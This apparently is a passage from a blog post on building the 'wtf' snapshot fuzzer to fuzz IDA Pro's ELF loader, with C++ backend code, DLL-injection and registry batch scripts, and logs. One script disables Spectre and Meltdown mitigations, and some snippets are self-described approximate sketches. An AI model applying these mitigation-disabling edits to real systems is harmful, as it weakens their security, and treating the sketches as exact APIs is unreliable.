The most annoying thing for me was that execution backends are extremely opaque. It is really hard to see what's going on within them. Actually, if you have ever tried to use whv / kvm APIs you probably ran into the case where the API tells you that you loaded a 'wrong' CPU state. It might be an MSR not configured right, a weird segment descriptor, etc. Figuring out where the issue comes from is both painful and frustrating.

Not knowing what's happening is also annoying when the guest is bug-checking inside the backend. To address the lack of transparency I decided to generate execution traces that I could use for debugging. It is very rudimentary yet very useful to verify that the execution inside the backend is correct. In addition to this tool, you can always modify your module to add strategic breakpoints and dump registers when you want. Those traces are pretty cool because you get to follow everything that happens in the system: from user-mode to kernel-mode, the page-fault handler, etc.

Those traces can also be loaded into lighthouse to analyze the coverage generated by a particular test case.
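
For illustration, a rip trace can be emitted straight from the execution hook shown earlier; the TraceFile_ member below is an assumption (wtf's real trace code supports several formats), but the idea is simply one executed address per line that can later be symbolized and fed to lighthouse:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu and append it to the trace file
  // (TraceFile_ is assumed to be an std::ofstream opened beforehand).
  //

  const uint64_t Rip = bochscpu_cpu_rip(Cpu_);
  if (TraceFile_.is_open()) {
    TraceFile_ << fmt::format("{:#x}\n", Rip);
  }

  // ... code coverage / breakpoint handling as shown earlier ...
}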

Crash detection

The last basic block that I needed was user-mode crash detection. I had done some past work around the user-mode exception handling machinery, so I kind of knew my way around it. I decided to hook ntdll!RtlDispatchException to catch user-mode exceptions, as well as nt!KiRaiseSecurityCheckFailure to detect fail-fast exceptions such as the ones triggered by a stack cookie check failure.
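
A rough sketch of that wiring is shown below; the SetBreakpoint, Stop, and Crash_t names are assumptions used for illustration (based on the breakpoint map shown earlier), not necessarily wtf's exact interface:

// Hypothetical sketch: mark the test case as a crash and stop the CPU when
// the user-mode exception dispatcher or the fail-fast path is reached.
if (!g_Backend->SetBreakpoint(
        "ntdll!RtlDispatchException", [](Backend_t *Backend) {
          // An exception is being dispatched in user mode: treat it as a crash.
          Backend->Stop(Crash_t());
        })) {
  return false;
}

if (!g_Backend->SetBreakpoint(
        "nt!KiRaiseSecurityCheckFailure", [](Backend_t *Backend) {
          // Fail-fast, e.g. a stack cookie check failure: also a crash.
          Backend->Stop(Crash_t());
        })) {
  return false;
}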

Harnessing IDA: walking barefoot into the desert

Once I was done writing the basic features, I started to harness IDA. I knew I wanted to target the loader plugins, and based on their size as well as past vulnerabilities, it felt like looking at the ELF loader was my best chance.

I initially started to harness IDA with its GUI and everything. In retrospect, this was bonkers, as I remember handling tons of weird things related to Qt and win32k. After a few weeks of making progress here and there, I realized that IDA had a few options to make my life easier:

  • IDA_NO_HISTORY=1 meant that I didn't have to handle as many registry accesses,
  • The -B option allows running IDA in batch-mode from the command line,
  • TVHEADLESS=1 also helped a lot regarding GUI/Qt stuff I was working around.

Some of those options were documented later this year by Igor in this blog post: Igor’s tip of the week #08: Batch mode under the hood.

Inserting test case

After finding out about those options, it immediately felt like harnessing was possible again. The main problem I had was that IDA reads the input file lazily via fread, fseek, etc. It also reads a bunch of other things like configuration files, the license file, etc.

To be able to deliver my test cases, I implemented a layer of hooks that allowed me to pass file I/O through from the guest to my host. This allowed me to read my IDA license keys and the configuration files as well as my input. It also meant that I could sink the file writes made to the .id0, .id1, .nam, and all the other files that IDA generates that I didn't care about. This was quite a bit of work and it was not really fun work either.

I was not a big fan of this pass-through layer because I was worried that a bug in my code could mean overwriting files on my host or lead to that kind of badness. That is why I decided to replace it by reading from memory buffers. During startup, wtf reads the actual files into buffers, and the file-system hooks deliver the bytes as needed. You can see this work in fshooks.cc.

This is an example of what this layer allowed me to do:

bool Ida64ConfigureFsHandleTable(const fs::path &GuestFilesPath) {

  //
  // Those files are files we want to redirect to host files. When there is
  // a hooked i/o targeted to one of them, we deliver the i/o on the host
  // by calling the appropriate syscalls and proxy back the result to the
  // guest.
  //

  const std::vector<std::u16string> GuestFiles = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida.key)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\ida.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\noret.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\pe.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\plugins\plugins.cfg)"};

  for (const auto &GuestFile : GuestFiles) {
    const size_t LastSlash = GuestFile.find_last_of(uR"(\)");
    if (LastSlash == GuestFile.npos) {
      fmt::print("Expected a / in {}\n", u16stringToString(GuestFile));
      return false;
    }

    const std::u16string GuestFilename = GuestFile.substr(LastSlash + 1);
    const fs::path HostFile(GuestFilesPath / GuestFilename);

    size_t BufferSize = 0;
    const auto Buffer = ReadFile(HostFile, BufferSize);
    if (Buffer == nullptr || BufferSize == 0) {
      fmt::print("Expected to find {}.\n", HostFile.string());
      return false;
    }

    g_FsHandleTable.MapExistingGuestFile(GuestFile.c_str(), Buffer.get(),
                                         BufferSize);
  }

  g_FsHandleTable.MapExistingWriteableGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id0)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id1)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.nam)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id2)");

  //
  // Those files are files we want to pretend that they don't exist in the
  // guest.
  //

  const std::vector<std::u16string> NotFounds = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida64.int)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\idsnames)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc6.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc9.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\flirt.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\geos.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\linux.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\os2.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win7.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\wince.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\loaders\hppacore.idc)",
      uR"(\??\C:\Users\over\AppData\Roaming\Hex-Rays\IDA Pro\proccache64.lst)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\Latin_1.clt)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\dwarf.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\atrap.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\hpux.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\i960.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\goodname.cfg)"};

  for (const std::u16string &NotFound : NotFounds) {
    g_FsHandleTable.MapNonExistingGuestFile(NotFound.c_str());
  }

  g_FsHandleTable.SetBlacklistDecisionHandler([](const std::u16string &Path) {
    // \ids\pc\api-ms-win-core-profile-l1-1-0.idt
    // \ids\api-ms-win-core-profile-l1-1-0.idt
    // \sig\pc\vc64seh.sig
    // \til\pc\gnulnx_x64.til
    // 6ba8075c8f243566350f741c7d6e9318089add.debug
    const bool IsIdt = Path.ends_with(u".idt");
    const bool IsIds = Path.ends_with(u".ids");
    const bool IsSig = Path.ends_with(u".sig");
    const bool IsTil = Path.ends_with(u".til");
    const bool IsDebug = Path.ends_with(u".debug");
    const bool Blacklisted = IsIdt || IsIds || IsSig || IsTil || IsDebug;

    if (Blacklisted) {
      return true;
    }

    //
    // The parser can invoke ida64!import_module to have the user select
    // a file that gets imported by the binary currently analyzed. This is
    // fine if the import directory is well formatted; when it's not, it
    // potentially uses garbage from the file as a path name. The strategy
    // here is to block the access if the path is not ASCII.
    //

    for (const auto &C : Path) {
      if (isascii(C)) {
        continue;
      }

      DebugPrint("Blocking a weird NtOpenFile: {}\n", u16stringToString(Path));
      return true;
    }

    return false;
  });

  return true;
}

Although this was probably the most annoying problem, I had to deal with plenty more. I've decided to walk you through some of them.

Problem 1: Pre-load dlls

To figure out which loader is the right one to use, IDA loads all of them and asks each one if it recognizes the file. Remember that there is no disk when running in wtf, so loading a DLL is a problem.

I solved this by injecting the DLLs into IDA with inject before generating the snapshot, so that when IDA loads them it doesn't generate any file I/O. The same problem applies to delay-loaded DLLs.

Problem 2: Paged-out memory

On Windows, memory can be swapped out and written to disk, into the pagefile.sys file. When somebody accesses memory that has been paged out, the access triggers a #PF, which the page fault handler resolves by loading the page back up from the pagefile. But again, this generates file I/O.

I solved this problem for user-mode with lockmem, which is a small utility that locks all virtual memory ranges into the process working set. As an example, this is the script I used to snapshot IDA; it highlights how I used both inject and lockmem:

set BASE_DIR=C:\Program Files\IDA Pro 7.5
set PLUGINS_DIR=%BASE_DIR%\plugins
set LOADERS_DIR=%BASE_DIR%\loaders
set PROCS_DIR=%BASE_DIR%\procs
set NTSD=C:\Users\over\Desktop\x64\ntsd.exe

REM Remove a bunch of plugins
del "%PLUGINS_DIR%\python.dll"
del "%PLUGINS_DIR%\python64.dll"
[...]
REM Turning on PH
REM 02000000 Enable page heap (full page heap)
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "GlobalFlag" /t REG_SZ /d "0x2000000" /f
REM This is useful to disable stack-traces
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "PageHeapFlags" /t REG_SZ /d "0x0" /f

REM History is stored in the registry and so triggers cr3 change (when attaching to Registry process VA)
set IDA_NO_HISTORY=1
REM Set up headless mode and run IDA
set TVHEADLESS=1
REM https://www.hex-rays.com/products/ida/support/idadoc/417.shtml
start /b %NTSD% -d "%BASE_DIR%\ida64.exe" -B wtf_input

REM bp ida64!init_database
REM Bump suspend count: ~0n
REM Detach: qd
REM Find process, set ba e1 on address from kdbg
REM ntsd -pn ida64.exe ; fix suspend count: ~0m
REM should break.

REM Inject the dlls.
inject.exe ida64.exe "%PLUGINS_DIR%"
inject.exe ida64.exe "%LOADERS_DIR%"
inject.exe ida64.exe "%PROCS_DIR%"
inject.exe ida64.exe "%BASE_DIR%\libdwarf.dll"

REM Lock everything
lockmem.exe ida64.exe

REM You can now reattach; and ~0m to bump down the suspend count
%NTSD% -pn ida64.exe

Problem 3: Manually soft page-fault in memory from hooks

To insert my test cases in memory, I used the file system hook layer I described above as well as the virtual memory facilities that we talked about earlier. Sometimes, the caller would allocate a memory buffer and call, let's say, fread to read the file into the buffer. When fread was invoked, my hook triggered, and sometimes calling VirtWrite would fail. After debugging and inspecting the state of the PTEs, it was clear that the PTE was in an invalid state. This is explained by the fact that memory is lazy on Windows: a page fault is expected to be raised, and the page fault handler fixes up the PTE itself and execution carries on. Because we are doing the memory write ourselves, we don't generate a page fault, and so the page fault handler never gets invoked.

To solve this, I try to do a virtual-to-physical translation and inspect the result. If the translation is successful, it means the page tables are in a good state and I can perform the memory access. If it is not, I insert a page fault in the guest and resume execution. When execution restarts, the page fault handler runs, fixes the PTE, and returns execution to the instruction that was executing before the page fault. Because we have our hook there, we get reinvoked a second time, but this time the virtual-to-physical translation works and we can do the memory write. Here is an example in ntdll!NtQueryAttributesFile:

if (!g_Backend->SetBreakpoint(
        "ntdll!NtQueryAttributesFile", [](Backend_t *Backend) {
          // NTSTATUS NtQueryAttributesFile(
          //  _In_  POBJECT_ATTRIBUTES      ObjectAttributes,
          //  _Out_ PFILE_BASIC_INFORMATION FileInformation
          //);
          // ...
          //
          // Ensure that the GuestFileInformation is faulted-in memory.
          //

          if (GuestFileInformation &&
              Backend->PageFaultsMemoryIfNeeded(
                  GuestFileInformation, sizeof(FILE_BASIC_INFORMATION))) {
            return;
          }

Problem 4: KVA shadow

When I snapshot IDA, the CPU is in user-mode, but some of the breakpoints I set up are on functions living in kernel-mode. To be able to set a breakpoint on those, wtf simply does a VirtTranslate and modifies physical memory with an int3 opcode. This is exactly what KVA Shadow prevents: the user-mode @cr3 doesn't contain the part of the page tables that describes kernel-mode (only a few stubs), and so there is no valid translation.

To solve this, I simply disabled KVA Shadow with the registry edits below:

REM To disable mitigations for CVE-2017-5715 (Spectre Variant 2) and CVE-2017-5754 (Meltdown)
REM https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f

Problem 5: Identifying bottlenecks

While developing wtf, I allocated time to profile the tool under specific workloads with the Intel VTune Profiler, which is now free. If you have never used it, you really should, as it is both absolutely fascinating and really useful. If you care about performance, you need to measure in order to understand where you can have the most impact. Not measuring is a big mistake, because you will most likely spend time changing code that might not even matter. If you try to optimize something, you should also be able to measure the impact of your change.

For example, below is the VTune hotspot analysis report for the following invocation:

wtf.exe run --name hevd --backend whv --state targets\hevd\state --runs=100000 --input targets\hevd\crashes\crash-0xfffff764b91c0000-0x0-0xffffbf84fb10e780-0x2-0x0

[Image: VTune hotspot analysis report]

This report is really catastrophic because it means we spend twice as much time dealing with memory access faults as actually running target code. Handling memory access faults should take very little time. If anybody knows their way around whv & performance, it'd be great if you reached out, because I really have no idea why it is that slow.

The birth of hope

After tons of work, I could finally execute the ELF loader from start to end and see the messages you would normally see in the output window. In the log below, you can see IDA loading the elf64.dll loader, then initializing the database as well as the b-tree. It then loads processor modules, creates segments, processes relocations, and finally loads the DWARF modules to parse debug information:

>wtf.exe run --name ida64-elf75 --backend whv --state state --input ntfs-3g
Initializing the debugger instance.. (this takes a bit of time)
Parsing coverage\dwarf64.cov..
Parsing coverage\elf64.cov..
Parsing coverage\libdwarf.cov..
Applied 43624 code coverage breakpoints
[...]
Running ntfs-3g
[...]
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\loaders\elf64.dll)
ida64: ida64!msg(format="Possible file format: %s (%s) ", ...)
ida64: ELF64 for x86-64 (Shared object) - ELF64 for x86-64 (Shared object)
[...]
ida64: ida64!msg(format="   bytes   pages size description --------- ----- ---- -------------------------------------------- %9lu %5u %4u allocating memory for b-tree... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for virtual array... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for name pointers... ----------------------------------------------------------------- %9u
total memory allocated  ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k064.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k0s64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\ad218x64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\alpha64.dll)
[...]
ida64: ida64!msg(format="Loading file '%s' into database... Detected file format: %s ", ...)
ida64: ida64!msg(format="Loading processor module %s for %s...", ...)
ida64: ida64!msg(format="Initializing processor module %s...", ...)
ida64: ida64!msg(format="OK ", ...)
ida64: ida64!mbox(format="@0:1139[] Can't use BIOS comments base.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: ida64!msg(format="Autoanalysis subsystem has been initialized. ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
[...]
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Reading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Loading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="", ...)
ida64: ida64!msg(format="Processing relocations... ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!mbox(format="Unexpected entries in the PLT stub. The file might have been modified after linking.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: Unexpected entries in the PLT stub.
The file might have been modified after linking.
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
[...]
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dbg64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dwarf64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\libdwarf.dll)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="Plugin "%s" not found ", ...)
ida64: Hit the end of load file :o

Need for speed: whv backend

At this point, I was able to fuzz IDA, but the speed was incredibly slow: I could execute about 0.01 test cases per second. It was really cool to see it working, finding new code coverage, etc., but I felt I wouldn't find much at this speed. That's why I decided to look at using whv to implement an execution backend.

I had played around with whv before with pywinhv so I knew the features offered by the API well. As this was the first execution backend using virtualization I had to rethink a bunch of the fundamentals.

Code coverage

What I settled on is to use one-time software breakpoints at the beginning of basic blocks. The user simply needs to generate a list of breakpoint addresses into a JSON file, and wtf consumes this file during initialization. This means that the user can selectively pick the modules they want coverage for.

It is annoying though, because it means you need to throw those modules into IDA and generate the JSON file for each of them. The script I use for that is available here: gen_coveragefile_ida.py. You could obviously generate the file yourself via other tools.
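To make the flow a bit more concrete, here is a hedged sketch of what consuming such a coverage file could look like. The JSON layout ("base" / "addresses") and the SetCoverageBreakpoint() call are hypothetical names used for illustration; wtf's real format is whatever gen_coveragefile_ida.py emits:

//
// Hedged sketch: read a JSON coverage file and register one-time breakpoints
// at the start of every basic block.
//
#include <cstdint>
#include <filesystem>
#include <fstream>
#include <nlohmann/json.hpp>

bool LoadCoverageFile(Backend_t *Backend,
                      const std::filesystem::path &CovFile) {
  std::ifstream In(CovFile);
  if (!In) {
    fmt::print("Could not open {}.\n", CovFile.string());
    return false;
  }

  nlohmann::json Doc;
  In >> Doc;

  const uint64_t Base = Doc["base"].get<uint64_t>();
  for (const auto &Entry : Doc["addresses"]) {
    const Gva_t Gva = Gva_t(Base + Entry.get<uint64_t>());

    //
    // The breakpoint is removed the first time it is hit, so its cost is
    // only paid once per basic block.
    //

    if (!Backend->SetCoverageBreakpoint(Gva)) {
      return false;
    }
  }

  return true;
}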

Overall, I think it is a good enough tradeoff. I did try to play with more creative & esoteric ways to acquire code coverage though, such as filling the address space with int3s and lazily populating code by leveraging a length-disassembler engine to know the size of instructions. I loved this idea, but I ran into tons of problems with switch tables that embed data in code sections: wtf corrupts them when setting software breakpoints, which leads to a bunch of spectacular crashes a little bit everywhere in the system, so I abandoned this idea. The trap flag was awfully slow, and whv doesn't expose the Monitor Trap Flag.

The ideal for me would be to find a way to preserve the performance while acquiring code coverage without knowing anything about the target, like with bochscpu.

Dirty memory

The other thing that I needed was to be able to track dirty memory. whv provides WHvQueryGpaRangeDirtyBitmap to do just that, which was perfect.
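For reference, here is a hedged sketch of how the dirty bitmap can be queried for the guest RAM region; the function's exact signature is from WinHvPlatform.h as I remember it, and the partition handle / RAM size are placeholders:

//
// Hedged sketch: fetch one dirty bit per 4KiB guest physical page. How the
// bitmap is then consumed by the restore loop is not shown here.
//
#include <windows.h>
#include <WinHvPlatform.h>
#include <vector>

std::vector<UINT64> QueryDirtyBitmap(const WHV_PARTITION_HANDLE Partition,
                                     const UINT64 RamSizeInBytes) {
  const UINT64 NumberPages = RamSizeInBytes / 0x1000;
  std::vector<UINT64> Bitmap((NumberPages + 63) / 64);

  const HRESULT Hr = WHvQueryGpaRangeDirtyBitmap(
      Partition, 0, RamSizeInBytes, Bitmap.data(),
      UINT32(Bitmap.size() * sizeof(UINT64)));

  if (FAILED(Hr)) {
    Bitmap.clear();
  }

  return Bitmap;
}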

Tracing

One thing that I would have loved was to be able to generate execution traces like with bochscpu. I initially thought I'd be able to mirror this functionality using the trap flag. But if you turn on the trap flag before, let's say, a syscall instruction, the single-step fault gets raised only after the instruction, and so you miss the entire kernel side executing. I discovered that this is due to how syscall is implemented: it masks RFLAGS with the IA32_FMASK MSR, stripping away the trap flag. After programming IA32_FMASK myself, I could trace through syscalls, which was great. By comparing traces generated by the two backends, I noticed that the whv trace was missing page faults. This is basically another instance of the same problem: when an interruption happens, the CPU saves the current context and loads a new one from the task segment, which doesn't have the trap flag set. I can't remember if I got that working or if it turned out to be harder than it looked, but I ended up reverting the code and settled for only generating code coverage traces. It is definitely something I would love to revisit in the future.
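As an illustration of the IA32_FMASK trick, below is a hedged sketch using the raw whv register APIs; wtf's backend wraps these differently, and the exact WHvX64RegisterSfmask name is from memory, so treat this as an assumption-heavy example:

//
// Hedged sketch: remove the trap flag (RFLAGS.TF, bit 8) from the syscall
// flag mask so single-stepping survives the user to kernel transition.
//
#include <windows.h>
#include <WinHvPlatform.h>

bool KeepTrapFlagAcrossSyscalls(const WHV_PARTITION_HANDLE Partition,
                                const UINT32 VpIndex) {
  const WHV_REGISTER_NAME Name = WHvX64RegisterSfmask;
  WHV_REGISTER_VALUE Value = {};

  if (FAILED(WHvGetVirtualProcessorRegisters(Partition, VpIndex, &Name, 1,
                                             &Value))) {
    return false;
  }

  //
  // Bits set in IA32_FMASK get cleared from RFLAGS by the syscall
  // instruction; clearing TF from the mask keeps single-stepping alive.
  //

  Value.Reg64 &= ~0x100ULL;
  return SUCCEEDED(WHvSetVirtualProcessorRegisters(Partition, VpIndex, &Name,
                                                   1, &Value));
}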

Timeout

To protect the fuzzer against infinite loops and to limit the execution time, I use a timer to tell the virtual processor to stop execution. This is not as good as what bochscpu offered us, because it is not as precise, but it's the only solution I could come up with:

class TimerQ_t {
  HANDLE TimerQueue_ = nullptr;
  HANDLE LastTimer_ = nullptr;

  static void CALLBACK AlarmHandler(PVOID, BOOLEAN) {
    reinterpret_cast<WhvBackend_t *>(g_Backend)->CancelRunVirtualProcessor();
  }

public:
  ~TimerQ_t() {
    if (TimerQueue_) {
      DeleteTimerQueueEx(TimerQueue_, nullptr);
    }
  }

  TimerQ_t() = default;
  TimerQ_t(const TimerQ_t &) = delete;
  TimerQ_t &operator=(const TimerQ_t &) = delete;

  void SetTimer(const uint32_t Seconds) {
    if (Seconds == 0) {
      return;
    }

    if (!TimerQueue_) {
      TimerQueue_ = CreateTimerQueue();
      if (!TimerQueue_) {
        fmt::print("CreateTimerQueue failed.\n");
        exit(1);
      }
    }

    if (!CreateTimerQueueTimer(&LastTimer_, TimerQueue_, AlarmHandler,
                                nullptr, Seconds * 1000, Seconds * 1000, 0)) {
      fmt::print("CreateTimerQueueTimer failed.\n");
      exit(1);
    }
  }

  void TerminateLastTimer() {
    DeleteTimerQueueTimer(TimerQueue_, LastTimer_, nullptr);
  }
};
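Presumably such a timer gets armed around every execution, along these lines (a small sketch; the TimeoutSeconds / RunTestCase names are made up for illustration):

//
// Hedged sketch: bound one test case execution with the TimerQ_t class above.
//
void RunOneTestCase(const uint32_t TimeoutSeconds) {
  TimerQ_t Timer;
  Timer.SetTimer(TimeoutSeconds);

  //
  // If we blow through the budget, the timer callback calls
  // CancelRunVirtualProcessor() and kicks the vcpu out of execution.
  //

  RunTestCase();
  Timer.TerminateLastTimer();
}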

Inserting page faults

To be able to insert a page fault into the guest I use the WHvRegisterPendingEvent register and a WHvX64PendingEventException event type:

bool WhvBackend_t::PageFaultsMemoryIfNeeded(const Gva_t Gva,
                                            const uint64_t Size) {
  const Gva_t PageToFault = GetFirstVirtualPageToFault(Gva, Size);

  //
  // If we haven't found any GVA to fault-in then we have no job to do so we
  // return.
  //

  if (PageToFault == Gva_t(0xffffffffffffffff)) {
    return false;
  }

  WhvDebugPrint("Inserting page fault for GVA {:#x}\n", PageToFault);

  // cf 'VM-Entry Controls for Event Injection' in Intel 3C
  WHV_REGISTER_VALUE_t Exception;
  Exception->ExceptionEvent.EventPending = 1;
  Exception->ExceptionEvent.EventType = WHvX64PendingEventException;
  Exception->ExceptionEvent.DeliverErrorCode = 1;
  Exception->ExceptionEvent.Vector = WHvX64ExceptionTypePageFault;
  Exception->ExceptionEvent.ErrorCode = ErrorWrite | ErrorUser;
  Exception->ExceptionEvent.ExceptionParameter = PageToFault.U64();

  if (FAILED(SetRegister(WHvRegisterPendingEvent, &Exception))) {
    __debugbreak();
  }

  return true;
}

Determinism

The last feature that I wanted was to get as much determinism as I could. After tracing a bunch of executions, I realized that nt!ExGenRandom uses rdrand in the Windows kernel, and this was a big source of non-determinism across executions. Intel does support generating a vmexit when the instruction is executed, but this is also not exposed by whv.

I settled for setting a breakpoint on the function and emulating its behavior with a deterministic implementation:

//
// Make ExGenRandom deterministic.
//
// kd> ub fffff805`3b8287c4 l1
// nt!ExGenRandom+0xe0:
// fffff805`3b8287c0 480fc7f2        rdrand  rdx
const Gva_t ExGenRandom = Gva_t(g_Dbg.GetSymbol("nt!ExGenRandom") + 0xe4);
if (!g_Backend->SetBreakpoint(ExGenRandom, [](Backend_t *Backend) {
      DebugPrint("Hit ExGenRandom!\n");
      Backend->Rdx(Backend->Rdrand());
    })) {
  return false;
}

I am not a huge fan of this solution because it means you need to know where the non-determinism is coming from, which is usually hard to figure out in the first place. Another source of non-determinism is the timestamp counter. As far as I can tell, this hasn't led to any major issues, but it might bite us in the future.

With the above implemented, I was able to run test cases through the backend end to end which was great. Below I describe some of the problems I solved while testing it.

Problem 6: Code coverage breakpoints not free

Profiling wtf revealed that the code coverage breakpoints I thought were free were not quite that free. The theory is that they are one-time breakpoints and, as a result, you only pay their cost once. This leads to a warm-up cost that you pay at the start of the run, while the fuzzer is discovering the highly reachable sections of code, but over time it should become free.

The problem in my implementation was in the code used to restore those breakpoints after executing a test case. I tracked the code coverage breakpoints that hadn't been hit yet in a list. When restoring, I would start by restoring every dirty page and then iterate through this list to reset the code-coverage breakpoints. It turns out this was highly inefficient when you have hundreds of thousands of breakpoints.

I did what you usually do when you have a performance problem: I traded CPU time for memory. The answer to this problem is the Ram_t class. The way it works is that every time you add a code coverage breakpoint, it duplicates the page and sets a breakpoint in this copy as well as in the guest RAM.

//
// Add a breakpoint to a GPA.
//

uint8_t *AddBreakpoint(const Gpa_t Gpa) {
  const Gpa_t AlignedGpa = Gpa.Align();
  uint8_t *Page = nullptr;

  //
  // Grab the page if we have it in the cache
  //

  if (Cache_.contains(Gpa.Align())) {
    Page = Cache_.at(AlignedGpa);
  }

  //
  // Or allocate and initialize one!
  //

  else {
    Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
    if (Page == nullptr) {
      fmt::print("Failed to call aligned_alloc.\n");
      return nullptr;
    }

    const uint8_t *Virgin =
        Dmp_.GetPhysicalPage(AlignedGpa.U64()) + AlignedGpa.Offset().U64();
    if (Virgin == nullptr) {
      fmt::print(
          "The dump does not have a page backing GPA {:#x}, exiting.\n",
          AlignedGpa);
      return nullptr;
    }

    memcpy(Page, Virgin, Page::Size);
  }

  //
  // Apply the breakpoint.
  //

  const uint64_t Offset = Gpa.Offset().U64();
  Page[Offset] = 0xcc;
  Cache_.emplace(AlignedGpa, Page);

  //
  // And also update the RAM.
  //

  Ram_[Gpa.U64()] = 0xcc;
  return &Page[Offset];
}

When a code coverage breakpoint is hit, the class removes the breakpoint from both of those locations.

//
// Remove a breakpoint from a GPA.
//

void RemoveBreakpoint(const Gpa_t Gpa) {
  const uint8_t *Virgin = GetHvaFromDump(Gpa);
  uint8_t *Cache = GetHvaFromCache(Gpa);

  //
  // Update the RAM.
  //

  Ram_[Gpa.U64()] = *Virgin;

  //
  // Update the cache. We assume that an entry is available in the cache.
  //

  *Cache = *Virgin;
}

When you restore dirty memory, you simply iterate through the dirty pages and ask the Ram_t class to restore the content of each page. Internally, the class checks if the page has been duplicated, and if so, it restores from this copy. If it doesn't have one, it restores the content from the dump file. This lets us restore code coverage breakpoints at the cost of some extra memory:

//
